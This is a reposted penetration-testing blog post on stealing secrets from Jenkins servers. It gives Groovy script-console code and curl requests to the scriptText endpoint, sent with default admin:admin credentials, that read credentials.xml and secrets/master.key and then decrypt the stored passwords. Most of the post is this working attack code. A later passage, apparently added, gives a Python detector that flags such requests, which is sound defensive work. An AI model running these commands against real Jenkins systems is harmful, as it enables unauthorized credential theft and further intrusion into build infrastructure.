Jenkins - Decrypting credentials.xml

Andrew 2020-10-11
Web Security, published 2020-10-11 15:02:02

If you find yourself on a Jenkins machine with script console access, you can decrypt the passwords saved in credentials.xml as follows:

// Replace $PASSWORDHASH with the encrypted value taken from credentials.xml
hashed_pw = '$PASSWORDHASH'
passwd = hudson.util.Secret.decrypt(hashed_pw)
println(passwd)

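You need to run this on the Jenkins system itself, because it uses the local master.key and hudson.util.Secret.

Screenshot below:

[Screenshot: Jenkins - decrypting credentials.xml]
Code to get credentials.xml from the script console: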

Windows
// Buffers that collect the command's stdout and stderr
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'cmd.exe /c type credentials.xml'.execute()
proc.consumeProcessOutput(sout, serr)
// Wait up to 1000 ms, then kill the process
proc.waitForOrKill(1000)
println "out> $sout err> $serr"

*nix
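// Buffers that collect the command's stdout and stderr
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'cat credentials.xml'.execute()
proc.consumeProcessOutput(sout, serr)
// Wait up to 1000 ms, then kill the process
proc.waitForOrKill(1000)
println "out> $sout err> $serr"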


If you just want to do this with curl, you can hit the scriptText endpoint and do something like this:

Windows:
curl -u admin:admin 10.0.0.160:8080/scriptText --data "script=def+sout+%3D+new StringBuffer(),serr = new StringBuffer()%0D%0Adef+proc+%3D+%27cmd.exe+/c+type+credentials.xml%27.execute%28%29%0D%0Aproc.consumeProcessOutput%28sout%2C+serr%29%0D%0Aproc.waitForOrKill%281000%29%0D%0Aprintln+%22out%3E+%24sout+err%3E+%24serr%22&Submit=Run"

Also because this syntax took me a minute to figure out for files in subdirectories:
curl -u admin:admin 10.0.0.160:8080/scriptText --data "script=def+sout+%3D+new StringBuffer(),serr = new StringBuffer()%0D%0Adef+proc+%3D+%27cmd.exe+/c+type+secrets%5C\master.key%27.execute%28%29%0D%0Aproc.consumeProcessOutput%28sout%2C+serr%29%0D%0Aproc.waitForOrKill%281000%29%0D%0Aprintln+%22out%3E+%24sout+err%3E+%24serr%22&Submit=Run"

*nix
curl -u admin:admin 10.0.0.160:8080/scriptText --data "script=def+sout+%3D+new StringBuffer(),serr = new StringBuffer()%0D%0Adef+proc+%3D+%27cat+credentials.xml%27.execute%28%29%0D%0Aproc.consumeProcessOutput%28sout%2C+serr%29%0D%0Aproc.waitForOrKill%281000%29%0D%0Aprintln+%22out%3E+%24sout+err%3E+%24serr%22&Submit=Run"

Then to decrypt any passwords:
curl -u admin:admin 10.0.0.160:8080/scriptText --data "script=println(hudson.util.Secret.fromString('7pXrOOFP1XG62UsWyeeSI1m06YaOFI3s26WVkOsTUx0=').getPlainText())"
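
On the defensive side, the scriptText requests above leave a recognisable trace. The following is an added example, not code from the original post: it scans HTTP request records for script console calls and flags those whose decoded script references credential material. The record layout (method, URL, and a request body captured by a reverse proxy or WAF), the function names and the sample records are assumptions constructed for illustration.

```python
from urllib.parse import parse_qs, urlsplit

# Script console endpoints; endswith() also covers a context prefix
# such as /jenkins/scriptText or per-node consoles.
CONSOLE_SUFFIXES = ("/script", "/scriptText")
# Strings from the page's examples that indicate credential access.
SECRET_MARKERS = ("hudson.util.Secret", "credentials.xml", "master.key")


def inspect_request(method, url, body=""):
    """Return None for unrelated requests, else a finding dict."""
    parts = urlsplit(url)
    if not parts.path.rstrip("/").endswith(CONSOLE_SUFFIXES):
        return None
    # The script may arrive in the query string or the form body;
    # parse_qs undoes both '+' and %xx encoding.
    scripts = []
    for encoded in (parts.query, body):
        scripts += parse_qs(encoded).get("script", [])
    text = "\n".join(scripts)
    # Case-insensitive: Windows file names are not case sensitive.
    markers = [m for m in SECRET_MARKERS if m.lower() in text.lower()]
    return {"method": method, "path": parts.path, "script": text,
            "markers": markers,
            "severity": "high" if markers else "review"}


def scan(records):
    """Inspect (method, url, body) tuples and keep only the findings."""
    return [f for f in (inspect_request(*r) for r in records) if f]


# Constructed sample records: (method, url, body)
SAMPLE = [
    ("GET", "/job/build-app/lastBuild/console", ""),
    ("POST", "/scriptText", "script=println+%22hello%22"),
    ("POST", "/scriptText",
     "script=def+proc+%3D+%27cat+credentials.xml%27.execute%28%29&Submit=Run"),
    ("POST", "/jenkins/script",
     "script=println(hudson.util.Secret.fromString(%27PLACEHOLDER%27).getPlainText())"),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding["severity"], finding["path"], finding["markers"])
```

Any script console request is worth reviewing on its own; the marker match only raises the priority.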


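If you are in a position where you can access the files but not Jenkins, you can use: https://github.com/tweksteen/jenkins-decry...

The Python script has a small bug when it runs the regex, which had not been fixed at the time of writing. But here is a version where, instead of the regex, I just print out the values, and you can see the decrypted password. The change is on line 55.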


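March 19: the script only regexes for passwords (line 72); if there are SSH keys or other secrets, you may need to swap the regex... read the credentials.xml file :-)

April 19: this tweet outlines another, similar way: https://twitter.com/netmux/status/11152378...

Original link: http://carnal0wnage.attackresearch.com/201...

This work is licensed under a CC license; reposts must credit the author and link to this article.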